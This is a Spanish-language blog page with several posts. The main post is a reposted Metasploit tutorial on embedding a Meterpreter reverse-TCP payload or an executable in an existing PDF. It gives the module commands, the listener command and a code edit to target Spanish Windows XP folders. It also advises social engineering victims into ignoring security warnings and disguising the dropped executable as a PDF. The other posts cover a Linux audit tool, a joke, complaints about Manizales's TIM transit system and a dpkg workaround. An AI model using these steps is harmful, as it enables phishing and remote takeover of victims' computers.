Banner 1

Embebiendo un Ejecutable dentro de un PDF con MetaSploit

0 comentarios
Articulo muy interezante encontrado via kunfoosion por eso lo comparto igual al final dejo el link para que visiten su blog :D

-------------------------------------------------------------------------------------------------

En este artículo, vamos a ver como embeber un archivo ejecutable ".exe", dentro de un archivo PDF, utilizando el módulo "adobe_pdf_embedded_exe" de MetaSploit.

Leyendo el blog de F-Secure, me encontré con un post sobre PDF maliciosos que estaban siendo utilizados para ataques de espionaje. Al ser abiertos, dropeaban y corrían un archivo ejecutable, en este caso un Poison Ivy que luego se conectaba a una IP de Singapore.


MetaSploit: adobe_pdf_embedded_exe

Para testear el comportamiento de nuestros usuarios, ante una amenaza similar a esta, podemos replicar este ataque con el módulo "adobe_pdf_embedded_exe" de MetaSploit, en donde vamos a embeber un archivo ejecutable ".exe", o un payload de MetaSploit, dentro de un archivo PDF.

Por supuesto vamos a necesitar realizar un poco de ingeniería social, primero para que la víctima abra el PDF que le enviamos, y luego, para que ignore el warning de seguridad que aparecerá cuando se intente ejecutar el payload malicioso.

Lo interesante del módulo "adobe_pdf_embedded_exe", es que nos permitirá embeber el payload en cualquier PDF existente, lo que nos allanará el camino para realizar la ingeniería social. Por ejemplo, podríamos buscar PDF's existentes de una víctima en particular en Google:


Otra cosa a tener en cuenta, es que este módulo tiene rank de Excellent, por lo que es una buena opción, ante otros exploits para client side attacks que no son tan estables.


Embebiendo un Payload de MetaSploit en un PDF

Para embeber un payload, simplemente lo configuramos como a cualquier otro exploit, solamente debemos tener en cuenta que en la opción "INFILENAME" vamos a poner el path al archivo PDF que queremos utilizar, y en la opción "FILENAME", el nombre del nuevo archivo PDF con el payload embebido:

use windows/fileformat/adobe_pdf_embedded_exe
set INFILENAME /tmp/programa.pdf
set FILENAME evil.pdf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.102
exploit

Luego deberemos dejar escuchando por la conexión reversa que se va a generar una vez que la víctima abra el PDF:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.102 E

Cuando la víctima abra el archivo PDF, verá un warning:



Al momento de presion "Open", el payload será dropeado en el sistema, y un script intentará correrlo. Como el target de este módulo es Windows XP SP3 English, vemos en el warning que el payload es buscado dentro de "Desktop", "My Documents" y "Documents".

Para que funcione con un XP en español, debemos agregar en el código del módulo, los directorios "Escritorio" y "Mis Documentos", y volver a generar el PDF:
# editamos el módulo:
/framework3/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb

# reemplazamos la siguiente línea:
dirs = [ "Desktop", "My Documents", "Documents" ]

# por la siguiente línea:
dirs = [ "Desktop", "My Documents", "Documents", "Escritorio", "Mis Documentos" ]

Ahora si, se ejecutará el payload, y como podemos ver, lo hicimos con un Windows XP SP2 en Español:


Si vimos atentamente el warning, pudimos apreciar que al ejecutar el payload dropeado, lo hace de esta forma: "start programa.pdf".

El archivo que enviamos a la víctima se llamaba "evil.pdf", cuando dropeo el payload lo hizo con el nombre "programa.pdf", como el nombre del PDF verdadero que configuramos oportunamente. En realidad, "programa.pdf" es un archivo ".exe", con el payload de Meterpreter, pero como el comando "start" puede correr un ejecutable, sin importar la extensión que posea, esta hecho de esta forma para que el ataque pase un poco más desapercibido.


Embebiendo un Ejecutable en un PDF

Para embeber un archivo ejecutable dentro de nuestro PDF, simplemente configuramos la opción "EXENAME". En este caso estamos embebiendo la famosa calculadora de Windows "calc.exe":

set EXENAME /tmp/calc.exe
set INFILENAME /tmp/programa.pdf
exploit

Si bien el PAYLOAD no debería ser necesario configurarlo, ya que no estamos embebiendo un payload sino el ejecutable "calc.exe", por alguna razón si no lo configuramos no nos deja seguir.

set PAYLOAD windows/shell/bind_tcp
Cuando la víctima abra el archivo PDF, verá el warning pero ya con los directorios que agregamos:


Una vez que la víctima presione "Open", se correrá el archivo ejecutable que embebimos, el famoso "calc.exe":


Eso es todo amigos :-)

fuente:

http://kungfoosion.blogspot.com/2010/02/embebiendo-un-ejecutable-dentro-de-un.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+KungFooSion+%28KungFooSion%29

Auditar de una forma rápida la seguridad de la configuración de distribuciones Linux.

0 comentarios

Con la herramienta Yasat podemos auditar de una forma rápida la seguridad de la configuración de distribuciones Linux. Es una herramienta muy potente y tremendamente eficaz.

Puede auditar configuraciones de las distribuciones:

  • Gentoo.
  • Debian.
  • Ubuntu.
  • FreeBSD.
  • OpenBSD.

Yasat chequea la configuración en busca de fallos de seguridad en:

  • Configuración del Kernel.
  • Configuración de red.
  • Actualización de paquetes.
  • Cuentas de usuario.
  • Apache.
  • Bind DNS.
  • PHP.
  • Mysql.
  • Openvpn.
  • Snmpd.
  • Tomcat.
  • Vsftpd.
  • Xinetd.

Yasat es una herramienta ideal para los que dan sus primeros pasos en Linux y quieren implementar sistemas seguros. Pero también es útil para usuarios avanzados, porque siempre se puede escapar algún detalle y con un método de chequeo tan rápido vale la pena utilizarlo.

Más información de Yasat y descarga:
http://yasat.sourceforge.net/

FUENTE:
http://vtroger.blogspot.com/2010/01/auditar-de-una-forma-rapida-la.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+GuruDeLaInformtica+%28Guru+de+la++inform%C3%A1tica%29

Vino Linuxero

0 comentarios

¿Brindamos?


Encontrado via:

http://chistesgeeks.com/2010/02/18/vino-linuxero/

TIM ‏(transporte integrado de manizales)

0 comentarios
Que es el tim?

Segun la pagina oficial tim es:

TRANSPORTE INTEGRADO DE MANIZALES, TIM S.A. es una empresa industrial y comercial del estado, que tiene como misión la planeación, gestión, control e integración de los componentes del servicio público colectivo de pasajeros en Manizales.

TIM S.A. es el Ente Gestor, encargado de la coordinación y optima operación del Sistema Estratégico de Transporte de Manizales y Villamaría y tiene como objetivo el mejoramiento de la calidad de vida de todos los ciudadanos a través de la satisfacción de sus necesidades de movilización.

TIM S.A.
es además una empresa con la capacidad y conocimiento para prestar servicios relacionados con la actividad del Transporte Público como asesorías para el desarrollo e implementación de sistemas de transporte y estudios de movilidad y transporte entre otros.

Que novedad ofrece?

CARACTERÍSTICAS DEL TRANSBORDO:

  • Los transbordos se podrán realizar en cualquier tipología del sistema ya sea cable, microbús, bus o buseta.
  • Se deberá pagar el excedente cuando hay un cambio de un vehículo de menor tarifa a uno de mayor valor.
  • Ejemplo: Usted inicia su recorrido en un vehículo de una tarifa de $1.200 y hace transbordo u otro de $1.300, sólo será descontando $100 de su tarjeta inteligente TIM, que corresponde al excedente del pasaje.
  • El tiempo que se tiene para transbordar será de 35 minutos a partir de pasar por primera vez la tarjeta frente al validador.

Bueno dejando a un lado las definiciones dejare el siguiente texto que llego a mi correo y como es costumbre quiero compartirlo con ustedes amigos.

----------------------------------------------------------------------------------------------

OJO VIVO CIUDADANIA DE MANIZALES Y VILLAMARIA

CON EL FAMOSO TIM NUEVAMENTE A LA CIUDADANIA DE MANIZALES LE VAN A METER GATO POR LIEBRE Y NO ES LA PRIMERA VEZ. ¿QUE PASO CON LA SEGURIDAD CIUDADANA? QUE IMPLANTO EL ANTERIOR Y COMPROMETIDO DE INTEGRAMOS LUIS ROBERTO RIVAS.

LA TARJETA INTELIGENTE DENOMINADA "JUAN MANUEL LLANOS Y SUSUERTE" VALE $3.065 PESOS C/U, UN SIMPLE PEDAZO DE PLASTICO, QUE MAL MULTIPILICADO POR 100.000 USUARIOS NOS DA LA MODICA SUMA DE $306.000.000 MILLONES DE PESOS. PARA QUIEN ES ESTA MODICA SUMA? Y CON EL PASAR DE LOS DIAS UN IMPUESTO ADICIONAL POR LA RECARGA.NO OLVIDEN QUE NOS HIZO ESTE SEÑOR CUANDO FUE GERENTE DE EMTELSA.

EL COSTO DEL TRANSPORTE SUBIO $200 PESOS. QUE SIGNIFICA ENTRE UN 16% Y 25%, CUANDO EL SALARIO MINIMO SUBIO ESCASOS $15.OOO PESOS. Y TODO ESTO CON LA COMPLACENCIA DE UN CONCEJO DE MANIZALES DE PAPEL.

NUEVAMENTE NOS VAN A METER LOS DEDOS EN LA JETA. ESOS NOS PASA POR SER TAN BOLUDOS.


HJF

-----------------------------------------------------------------------------------------------

ACLARO: esto no lo escribi YO para no tener problemas despues....

Quiero expresar mis experiencias el dia de ayer y hoy con respecto al transporte.

1. El costo esta muy alto es un aumento indebido..acaso somos una ciudad grande que se puede dar este lujo?

2.Esta situacion paso varias veces el dia de hoy.... Por pasar varias veces la tarjeta se le cobro 2 y 3 pasages a la misma persona dejando sin dinero para volver al origen.... donde quedo los supuestos 100 pesos que descontaban en el transborde? y de no ser el caso quien hace la devolucion del dinero perdido mientras la maquina intentaba registrar la tarjeta? o ya me robaron la platica...

3. Si la tarjeta se daña se me pierde la platica que tengo ¿

4. Si al vehiculo se le daña el lector de tarjetas me toca esperar otro... suponiendo que era el ultimo ahora que hago? taxi?.(esto paso hoy).

5. Porque pagamos nosotros esto sabiendo fue el alcande quien queria ?.

6. porque al pueblo nunca lo escuchan¿?.

7. Que pasa con la platica que se pierde(al momento de registrarla varias veces y/o al dañarse la tarjeta).

8. Que paso con la preparacion a los conductores? ayer hubo enfrentamientos de los ciudadanos con los conductores por no decirles como funcionan pero lo que no saben es que a ellos nunca los prepararon.

9. Las nuevas rutas que? a nadie los prepararon para esto? almenos si no tiene dinero para comprar la patria y ver las rutas.......o un acceso a internet para ver las rutas en una presentacion ppt que solo lo entiende el que hizo eso, que pasa con el manual de usuario?????.

10. Que pasa con las rutas eliminadas? les tocara andar a los ciudadanos sin rutas? o pagar mas.

Estas son algunas de las reflexiones que hago el dia de hoy con respecto a las experiencias vividas y si no han notado nadie las responde.

OJO no doy opinion sobre nada solo expongo mis dudas al respecto y espere que en el transcurso de los dias se vayan aclarando.

Solo digo que se apresuraron mucho con este nuevo sistema y si bien es sabido todo nuevo cambio culturan se debe hacer lento(mucho mas cuando hay poblacion vulnerable a la tecnologia)

saludos roboticos

desistalar programas que no dejan borrarse en ubuntu

4 comentarios
Bueno estaba instalando paquetes desde consola con dpkg donde me salio errores de dependencia y adivinen? claro se jodio el gestor de paquetes.... me dice para desistalar debe reinstalar pero como espera que haga eso? xD.

En todo caso la solucion es mas sencilla. vamos a esta direccion


/var/lib/dpkg/info/nombredelarchivo.postrm

y lo renombramos

simplemente hago esto

mv /var/lib/dpkg/info/contalinex.postrm /root

y listo ya lo desistalamos :D

claro que debe existir soluciones mas tecnicas pero igual esto me recordo lo malo que es windows y ubuntu xD.

saludos roboticoss
Powered by Bad Robot
Helped by Blackubay